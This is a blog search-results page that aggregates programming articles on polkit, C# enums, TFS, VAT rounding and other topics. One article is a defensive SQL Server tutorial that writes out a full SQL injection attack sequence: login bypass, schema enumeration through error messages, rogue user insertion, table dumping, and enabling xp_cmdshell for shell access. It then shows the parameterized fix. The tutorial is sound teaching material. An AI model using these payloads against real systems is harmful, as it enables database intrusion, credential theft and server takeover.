Search Results

Search found 10071 results on 403 pages for 'operator module'.

Page 206/403 | < Previous Page | 202 203 204 205 206 207 208 209 210 211 212 213  | Next Page >

  • polkit: disable all users except those in group wheel?

    - by John Nash
    Is it possible to do the following using 1 polkit .pkla file? Disable all users except those in the wheel group from using polkit. The users in the wheel group will need to provide the root password when using polkit. /etc/polkit-1/localauthority/50-local.d/wheel-only.pkla [disable all users except the wheel group] Identity=unix-group:wheel Action=* ResultAny=??? ResultInactive=??? ResultActive=??? The following file works but you need to provide all the users in /etc/group: [disable all users except those in the wheel group: root and myuser] Identity=unix-user:daemon;unix-user:bin;unix-user:sys;unix-user:adm;unix-user:tty;unix-user:disk;unix-user:lp;unix-user:mail;unix-user:news;unix-user:uucp;unix-user:man;unix-user:proxy;unix-user:kmem;unix-user:dialout;unix-user:fax;unix-user:voice;unix-user:cdrom;unix-user:floppy;unix-user:tape;unix-user:sudo;unix-user:audio;unix-user:dip;unix-user:www-data;unix-user:backup;unix-user:operator;unix-user:list;unix-user:irc;unix-user:src;unix-user:gnats;unix-user:shadow;unix-user:utmp;unix-user:video;unix-user:sasl;unix-user:plugdev;unix-user:staff;unix-user:games;unix-user:users;unix-user:nogroup;unix-user:libuuid;unix-user:crontab;unix-user:messagebus;unix-user:Debian-exim;unix-user:mlocate;unix-user:avahi;unix-user:netdev;unix-user:bluetooth;unix-user:lpadmin;unix-user:ssl-cert;unix-user:fuse;unix-user:utempter;unix-user:Debian-gdm;unix-user:scanner;unix-user:saned;unix-user:i2c;unix-user:haldaemon;unix-user:powerdev Action=* ResultAny=no ResultInactive=no ResultActive=no

    Read the article

  • The Other "C" in CRM

    - by Brian Dayton
    Folks who know me know that I rarely, if ever, talk politics. And I never talk politicians. Having grown up in a household with one parent leaning left and the other leaning to the right it was the best way to keep the peace. This isn't about politics. It's about "constituents" and the need to improve the services and service levels for people--at the city, county, state/province, etc. level all the way up to national governments. As a citizen and tax payer it's also important to me that these services be provided at a reasonable cost. If there's a better and more efficient way to do something then it's my hope that a public sector organization takes advantage of technology the same way private sector companies do. Social services organizations have a complex job. They provide the services that people need, from healthcare and children's assistance to helping people find jobs. But many of these organizations are still managing these processes manually or outdated, home-grown applications that could have been written up to 30 years ago. A lot has changed in technology. On the (this is as political as I'm going to get) political front, stakeholders like you and me are expecting greater transparency on where and how funds are spent. I'll admit that most of the time, when I think about CRM systems, I think about my experience as a customer of my bank, utilities company or cable operator. But now that I'm older, have children and a house--I find myself interacting more and more with agencies and services organizations. My experiences are sometimes good and sometimes not so good. Along those lines, last week's announcement of Siebel CRM 8.2 for Public Sector caught my eye. You may not work in the public sector, but you are a constituent of some--actually a lot--of public sector organizations. I don't know which CRM systems city and county utilize but I'm going to start paying closer attention.

    Read the article

  • SQL SERVER – Take the Quiz for a chance to win a Quadcopter Drone – Brain Teasers

    - by Pinal Dave
    It has been a long time since we ran quiz. So let us get ready for a quiz. The quiz has two parts. You have to get both the parts correct to win Quadcopter with Camera (we will call it drone). We will be giving away a total of 2 Quadcopters. The quiz is extremely easy and I will ship the Drone anywhere in the world where Amazon will ship it. Let us jump directly to the quiz. Please complete all the three questions of the contest.  Contest Part 1: Brain Teasers There are two questions for you in this part of the contest. Question: There are two 7s. How will you write select statement with a single operator that returns single 7? Hint: SELECT 7(Answer)7 Question: Write down the shortest code that produces 1 without using any numbers in the select statement? Hint: SELECT (Answer) Contest Part 2: Download and Activate Rapid SQL Question: Download and Activate Rapid SQL. Hint: You have to download and activate Rapid SQL. If you do not activate Rapid SQL, you will be disqualified for the contest. Why take risk, let us start! That’s it! Just answer above questions in the following comments area, in following format. Remember: Use comments area right below the blog to take participation in the contest Answer before June 5, 2014 midnight GMT. The winner will be announced on June 8. The winner will be selected randomly from all the valid answers. All the valid answers will be kept hidden till June 5, 2014. There will be a total of two winners. The contest is open for any country of the world where Amazon ships products. Reference: Pinal Dave (http://blog.sqlauthority.com)Filed under: PostADay, SQL, SQL Authority, SQL Puzzle, SQL Query, SQL Server, SQL Tips and Tricks, T SQL

    Read the article

  • C#/.NET Little Wonders: Fun With Enum Methods

    - by James Michael Hare
    Once again lets dive into the Little Wonders of .NET, those small things in the .NET languages and BCL classes that make development easier by increasing readability, maintainability, and/or performance. So probably every one of us has used an enumerated type at one time or another in a C# program.  The enumerated types we create are a great way to represent that a value can be one of a set of discrete values (or a combination of those values in the case of bit flags). But the power of enum types go far beyond simple assignment and comparison, there are many methods in the Enum class (that all enum types “inherit” from) that can give you even more power when dealing with them. IsDefined() – check if a given value exists in the enum Are you reading a value for an enum from a data source, but are unsure if it is actually a valid value or not?  Casting won’t tell you this, and Parse() isn’t guaranteed to balk either if you give it an int or a combination of flags.  So what can we do? Let’s assume we have a small enum like this for result codes we want to return back from our business logic layer: 1: public enum ResultCode 2: { 3: Success, 4: Warning, 5: Error 6: } In this enum, Success will be zero (unless given another value explicitly), Warning will be one, and Error will be two. So what happens if we have code like this where perhaps we’re getting the result code from another data source (could be database, could be web service, etc)? 1: public ResultCode PerformAction() 2: { 3: // set up and call some method that returns an int. 4: int result = ResultCodeFromDataSource(); 5:  6: // this will suceed even if result is < 0 or > 2. 7: return (ResultCode) result; 8: } So what happens if result is –1 or 4?  Well, the cast does not fail, so what we end up with would be an instance of a ResultCode that would have a value that’s outside of the bounds of the enum constants we defined. This means if you had a block of code like: 1: switch (result) 2: { 3: case ResultType.Success: 4: // do success stuff 5: break; 6:  7: case ResultType.Warning: 8: // do warning stuff 9: break; 10:  11: case ResultType.Error: 12: // do error stuff 13: break; 14: } That you would hit none of these blocks (which is a good argument for always having a default in a switch by the way). So what can you do?  Well, there is a handy static method called IsDefined() on the Enum class which will tell you if an enum value is defined.  1: public ResultCode PerformAction() 2: { 3: int result = ResultCodeFromDataSource(); 4:  5: if (!Enum.IsDefined(typeof(ResultCode), result)) 6: { 7: throw new InvalidOperationException("Enum out of range."); 8: } 9:  10: return (ResultCode) result; 11: } In fact, this is often recommended after you Parse() or cast a value to an enum as there are ways for values to get past these methods that may not be defined. If you don’t like the syntax of passing in the type of the enum, you could clean it up a bit by creating an extension method instead that would allow you to call IsDefined() off any isntance of the enum: 1: public static class EnumExtensions 2: { 3: // helper method that tells you if an enum value is defined for it's enumeration 4: public static bool IsDefined(this Enum value) 5: { 6: return Enum.IsDefined(value.GetType(), value); 7: } 8: }   HasFlag() – an easier way to see if a bit (or bits) are set Most of us who came from the land of C programming have had to deal extensively with bit flags many times in our lives.  As such, using bit flags may be almost second nature (for a quick refresher on bit flags in enum types see one of my old posts here). However, in higher-level languages like C#, the need to manipulate individual bit flags is somewhat diminished, and the code to check for bit flag enum values may be obvious to an advanced developer but cryptic to a novice developer. For example, let’s say you have an enum for a messaging platform that contains bit flags: 1: // usually, we pluralize flags enum type names 2: [Flags] 3: public enum MessagingOptions 4: { 5: None = 0, 6: Buffered = 0x01, 7: Persistent = 0x02, 8: Durable = 0x04, 9: Broadcast = 0x08 10: } We can combine these bit flags using the bitwise OR operator (the ‘|’ pipe character): 1: // combine bit flags using 2: var myMessenger = new Messenger(MessagingOptions.Buffered | MessagingOptions.Broadcast); Now, if we wanted to check the flags, we’d have to test then using the bit-wise AND operator (the ‘&’ character): 1: if ((options & MessagingOptions.Buffered) == MessagingOptions.Buffered) 2: { 3: // do code to set up buffering... 4: // ... 5: } While the ‘|’ for combining flags is easy enough to read for advanced developers, the ‘&’ test tends to be easy for novice developers to get wrong.  First of all you have to AND the flag combination with the value, and then typically you should test against the flag combination itself (and not just for a non-zero)!  This is because the flag combination you are testing with may combine multiple bits, in which case if only one bit is set, the result will be non-zero but not necessarily all desired bits! Thanks goodness in .NET 4.0 they gave us the HasFlag() method.  This method can be called from an enum instance to test to see if a flag is set, and best of all you can avoid writing the bit wise logic yourself.  Not to mention it will be more readable to a novice developer as well: 1: if (options.HasFlag(MessagingOptions.Buffered)) 2: { 3: // do code to set up buffering... 4: // ... 5: } It is much more concise and unambiguous, thus increasing your maintainability and readability. It would be nice to have a corresponding SetFlag() method, but unfortunately generic types don’t allow you to specialize on Enum, which makes it a bit more difficult.  It can be done but you have to do some conversions to numeric and then back to the enum which makes it less of a payoff than having the HasFlag() method.  But if you want to create it for symmetry, it would look something like this: 1: public static T SetFlag<T>(this Enum value, T flags) 2: { 3: if (!value.GetType().IsEquivalentTo(typeof(T))) 4: { 5: throw new ArgumentException("Enum value and flags types don't match."); 6: } 7:  8: // yes this is ugly, but unfortunately we need to use an intermediate boxing cast 9: return (T)Enum.ToObject(typeof (T), Convert.ToUInt64(value) | Convert.ToUInt64(flags)); 10: } Note that since the enum types are value types, we need to assign the result to something (much like string.Trim()).  Also, you could chain several SetFlag() operations together or create one that takes a variable arg list if desired. Parse() and ToString() – transitioning from string to enum and back Sometimes, you may want to be able to parse an enum from a string or convert it to a string - Enum has methods built in to let you do this.  Now, many may already know this, but may not appreciate how much power are in these two methods. For example, if you want to parse a string as an enum, it’s easy and works just like you’d expect from the numeric types: 1: string optionsString = "Persistent"; 2:  3: // can use Enum.Parse, which throws if finds something it doesn't like... 4: var result = (MessagingOptions)Enum.Parse(typeof (MessagingOptions), optionsString); 5:  6: if (result == MessagingOptions.Persistent) 7: { 8: Console.WriteLine("It worked!"); 9: } Note that Enum.Parse() will throw if it finds a value it doesn’t like.  But the values it likes are fairly flexible!  You can pass in a single value, or a comma separated list of values for flags and it will parse them all and set all bits: 1: // for string values, can have one, or comma separated. 2: string optionsString = "Persistent, Buffered"; 3:  4: var result = (MessagingOptions)Enum.Parse(typeof (MessagingOptions), optionsString); 5:  6: if (result.HasFlag(MessagingOptions.Persistent) && result.HasFlag(MessagingOptions.Buffered)) 7: { 8: Console.WriteLine("It worked!"); 9: } Or you can parse in a string containing a number that represents a single value or combination of values to set: 1: // 3 is the combination of Buffered (0x01) and Persistent (0x02) 2: var optionsString = "3"; 3:  4: var result = (MessagingOptions) Enum.Parse(typeof (MessagingOptions), optionsString); 5:  6: if (result.HasFlag(MessagingOptions.Persistent) && result.HasFlag(MessagingOptions.Buffered)) 7: { 8: Console.WriteLine("It worked again!"); 9: } And, if you really aren’t sure if the parse will work, and don’t want to handle an exception, you can use TryParse() instead: 1: string optionsString = "Persistent, Buffered"; 2: MessagingOptions result; 3:  4: // try parse returns true if successful, and takes an out parm for the result 5: if (Enum.TryParse(optionsString, out result)) 6: { 7: if (result.HasFlag(MessagingOptions.Persistent) && result.HasFlag(MessagingOptions.Buffered)) 8: { 9: Console.WriteLine("It worked!"); 10: } 11: } So we covered parsing a string to an enum, what about reversing that and converting an enum to a string?  The ToString() method is the obvious and most basic choice for most of us, but did you know you can pass a format string for enum types that dictate how they are written as a string?: 1: MessagingOptions value = MessagingOptions.Buffered | MessagingOptions.Persistent; 2:  3: // general format, which is the default, 4: Console.WriteLine("Default : " + value); 5: Console.WriteLine("G (default): " + value.ToString("G")); 6:  7: // Flags format, even if type does not have Flags attribute. 8: Console.WriteLine("F (flags) : " + value.ToString("F")); 9:  10: // integer format, value as number. 11: Console.WriteLine("D (num) : " + value.ToString("D")); 12:  13: // hex format, value as hex 14: Console.WriteLine("X (hex) : " + value.ToString("X")); Which displays: 1: Default : Buffered, Persistent 2: G (default): Buffered, Persistent 3: F (flags) : Buffered, Persistent 4: D (num) : 3 5: X (hex) : 00000003 Now, you may not really see a difference here between G and F because I used a [Flags] enum, the difference is that the “F” option treats the enum as if it were flags even if the [Flags] attribute is not present.  Let’s take a non-flags enum like the ResultCode used earlier: 1: // yes, we can do this even if it is not [Flags] enum. 2: ResultCode value = ResultCode.Warning | ResultCode.Error; And if we run that through the same formats again we get: 1: Default : 3 2: G (default): 3 3: F (flags) : Warning, Error 4: D (num) : 3 5: X (hex) : 00000003 Notice that since we had multiple values combined, but it was not a [Flags] marked enum, the G and default format gave us a number instead of a value name.  This is because the value was not a valid single-value constant of the enum.  However, using the F flags format string, it broke out the value into its component flags even though it wasn’t marked [Flags]. So, if you want to get an enum to display appropriately for whether or not it has the [Flags] attribute, use G which is the default.  If you always want it to attempt to break down the flags, use F.  For numeric output, obviously D or  X are the best choice depending on whether you want decimal or hex. Summary Hopefully, you learned a couple of new tricks with using the Enum class today!  I’ll add more little wonders as I think of them and thanks for all the invaluable input!   Technorati Tags: C#,.NET,Little Wonders,Enum,BlackRabbitCoder

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • The art of Unit Testing with Examples in .NET

    - by outcoldman
    First time when I familiarized with unit testing was 5 or 6 years ago. It was start of my developing career. I remember that somebody told me about code coverage. At that time I didn’t write any Unit tests. Guy, who was my team lead, told me “Do you see operator if with three conditions? You should check all of these conditions”. So, after that I had written some code, I should go to interface and try to invoke all code which I wrote from user interface. Nice? At current time I know little more about tests and unit testing. I have not participated in projects, designed by Test Driven Development (TDD). Basics of my knowledge are a spying code of my colleagues, some articles and screencasts. I had decide that I should know much more, and became a real professional of unit testing, this is why I had start to read book The art of Unit Testing with Examples in .NET. More than, in my current job place looks like I’m just one who writing unit tests for my code. I should show good examples of my tests. ,a href="http://outcoldman.ru/en/blog/show/267"Read more...

    Read the article

  • 1.5 million Windows 7 phone’s sold…

    - by Boonei
    Microsoft announced that it has sold over 1.5 million windows 7 phone devices. Windows 7 is a new generation of OS. Mobile operators/users/device programmers need to adopt the same. Its not going to be a easy transition because it’s not an advanced/next version of win 6.x for mobile. We have heard that development from Microsoft side for Win 6.x devices will not continue after sometime. Don’t know how long will get the support! Everything in it s quite new, like OS, User interface, XBox sync, and also requires mobile phone companies to run the OS on high end chips, meaning atleast 1GHz. So the user segment occupied by phones like HTC Wild Fire are not the ones targeted.   Hey ! There an is a catch with this magic number 1.5 million…. It depicts only the number of units sold to mobile operators and retailers. It’s not the number of actual units held in consumers hands and activated. The number could improve significantly in 2011 where Sprint and Verizon join the party in United States. Atleast dozen phone models are in line up now in the rest of the world running Win 7 OS. One good things that customers can rejoice is that Microsoft will direly push software updates to all its consumers. Operator will not interfere. We can expect strong sales going forward with just this important point where Google’s Android lacks the same. [Img Credit: Microsoft] This article titled,1.5 million Windows 7 phone’s sold…, was originally published at Tech Dreams. Grab our rss feed or fan us on Facebook to get updates from us.

    Read the article

  • Enum.HasFlag

    - by Scott Dorman
    An enumerated type, also called an enumeration (or just an enum for short), is simply a way to create a numeric type restricted to a predetermined set of valid values with meaningful names for those values. While most enumerations represent discrete values, or well-known combinations of those values, sometimes you want to combine values in an arbitrary fashion. These enumerations are known as flags enumerations because the values represent flags which can be set or unset. To combine multiple enumeration values, you use the logical OR operator. For example, consider the following: public enum FileAccess { None = 0, Read = 1, Write = 2, }   class Program { static void Main(string[] args) { FileAccess access = FileAccess.Read | FileAccess.Write; Console.WriteLine(access); } } The output of this simple console application is: The value 3 is the numeric value associated with the combination of FileAccess.Read and FileAccess.Write. Clearly, this isn’t the best representation. What you really want is for the output to look like: To achieve this result, you simply add the Flags attribute to the enumeration. The Flags attribute changes how the string representation of the enumeration value is displayed when using the ToString() method. Although the .NET Framework does not require it, enumerations that will be used to represent flags should be decorated with the Flags attribute since it provides a clear indication of intent. One “problem” with Flags enumerations is determining when a particular flag is set. The code to do this isn’t particularly difficult, but unless you use it regularly it can be easy to forget. To test if the access variable has the FileAccess.Read flag set, you would use the following code: (access & FileAccess.Read) == FileAccess.Read Starting with .NET 4, a HasFlag static method has been added to the Enum class which allows you to easily perform these tests: access.HasFlag(FileAccess.Read) This method follows one of the “themes” for the .NET Framework 4, which is to simplify and reduce the amount of boilerplate code like this you must write. Technorati Tags: .NET,C# 4

    Read the article

  • What is "Open" anyway?

    - by EmbeddedInsider
    This terms is often used with many meanings.  For example, some people consider Flash 'open' and 'multi-platform' .  But Flash is a product of Adobe systems, locked down, copy protected and distribution restricted.  And versions for other than standard PC, home use, may carry licence fees. Check it out: 3.1 Adobe Runtime Restrictions. You will not use any Adobe Runtime on any non-PC device or with any embedded or device version of any operating system. For the avoidance of doubt, and by example only, you may not use an Adobe Runtime on any (a) mobile device, set top box (STB), handheld, phone, web pad, tablet and Tablet PC (other than with Windows XP Tablet PC Edition and its successors), game console, TV, DVD player, media center (other than with Windows XP Media Center Edition and its successors), electronic billboard or other digital signage, Internet appliance or other Internet-connected device, PDA, medical device, ATM, telematic device, gaming machine, home automation system, kiosk, remote control device, or any other consumer electronics device, (b) operator-based mobile, cable, satellite, or television system or (c) other closed system device. For information on licensing Adobe Runtimes for use on such systems please visit http://www.adobe.com/go/licensing. You will notice, for its embedded operating systems, Microsoft buys and includes a fully paid license for Adobe.   Do you get this with Linux?  Unix?  QNX? So, what is 'open'? Lawrence Ricci www.EmbeddedInsider.com

    Read the article

  • Sesame Data Browser: filtering, sorting, selecting and linking

    - by Fabrice Marguerie
    I have deferred the post about how Sesame is built in favor of publishing a new update.This new release offers major features such as the ability to quickly filter and sort data, select columns, and create hyperlinks to OData. Filtering, sorting, selecting In order to filter data, you just have to use the filter row, which becomes available when you click on the funnel button: You can then type some text and select an operator: The data grid will be refreshed immediately after you apply a filter. It works in the same way for sorting. Clicking on a column will immediately update the query and refresh the grid.Note that multi-column sorting is possible by using SHIFT-click: Viewing data is not enough. You can also view and copy the query string that returns that data: One more thing you can to shape data is to select which columns are displayed. Simply use the Column Chooser and you'll be done: Again, this will update the data and query string in real time: Linking to Sesame, linking to OData The other main feature of this release is the ability to create hyperlinks to Sesame. That's right, you can ask Sesame to give you a link you can display on a webpage, send in an email, or type in a chat session. You can get a link to a connection: or to a query: You'll note that you can also decide to embed Sesame in a webpage... Here are some sample links created via Sesame: Netflix movies with high ratings, sorted by release year Netflix horror movies from the 21st century Northwind discontinued products with remaining stock Netflix empty connection I'll give more examples in a post to follow. There are many more minor improvements in this release, but I'll let you find out about them by yourself :-)Please try Sesame Data Browser now and let me know what you think! PS: if you use Sesame from the desktop, please use the "Remove this application" command in the context menu of the destkop app and then "Install on desktop" again in your web browser. I'll activate automatic updates with the next release.

    Read the article

  • Search Work Items for TFS 2010 - New Extension

    - by MikeParks
    A few months ago I was constantly using Visual Studio 2008 with Team Foundation Server 2008. Searching for work items with queries inside Visual Studio became a pain until I found an add in that simplifed it into one little search box in the IDE.  It allowed me to enter some text in, hit the enter key, and it would bring back a list (aka open a .wiq file) of work items that matched the text entered. I became a huge fan of Noah Coad's Search Work Item Add In. He wrote a pretty good blog on how to use it as well. Of course when we upgraded to Visual Studio 2010 and Team Foundation Server 2010, the 2008 add in no longer worked. I didn't see any updates for it on codeplex to be 2010 compatible. Cory Cissell and I have published a few Visual Studio Extensions already so I figured I'd take a shot at making this tool 2010 compatible by turning it into an extension. Sure enough, it worked. We used it locally for a while and recently decided to publish it to the Visual Studio Gallery. If you are currently looking for an easy way to search work items in Visual Studio 2010, this is worth checking out. Big thanks goes out to Noah for originally creating this on codeplex. The extension we created can be downloaded here: http://visualstudiogallery.msdn.microsoft.com/en-us/3f31bfff-5ecb-4e05-8356-04815851b8e7      * Additional note: The default search fields are Title, History, and Description. If you want to modify which work item fields are searchable, type in "--template" (no quotes) into the search box and hit enter. This will open the search template. Just add another "Or" statement, pick the field name, select an operator, type "[search]" (no quotes) in the value field, and hit ctrl + s to save. The next time you run a search it will use the modified search template. That's all for now. Thanks! - Mike

    Read the article

  • How should I work out VAT (UK tax) in my eCommerce site?

    - by Leonard Challis
    We have an ecommerce system in place. The sales actually go through Sage, so we have an export script from our system that uses a third-party Sage Importer program. With a new version of this importer, values are checked more thoroughly. We are getting 1 pence discrepancies because of the way rounding works - our system has always held prices and worked to 4 decimal places. In the checkout the totals would be worked out first, then the rounding to 2 decimal places. The importer does rounding first, though. So, for instance: Our way: Product 1: £13.4561 Qty: 2 Total inc VAT = £32.29 (to 2dp) Importer way: Our way: Product 1: £13.4561 Qty: 2 Total inc VAT = £32.30 (to 2dp) Management are reluctant to lose the 4dp but the developers of the Sage importer have said that this is correct and makes sense -- you woudn't sell a product for £13.4561 in a shop, nor would you charge someone tax at 4 decimal places. I contacted the HMRC and the operator didn't really give me much to go on, telling me a technician would phone back, to which they haven't and I'm still waiting after almost a week and numerous follow-up calls. I did find a PDF on the HMRC's web site, but this did about us much to confuse me as it did to answer my questions. I see that they're happy for people to round up or down, as long it is consistent, but I can't tell whether it should be done on a line by line basis or on the end total of the order. We are now in the position where we 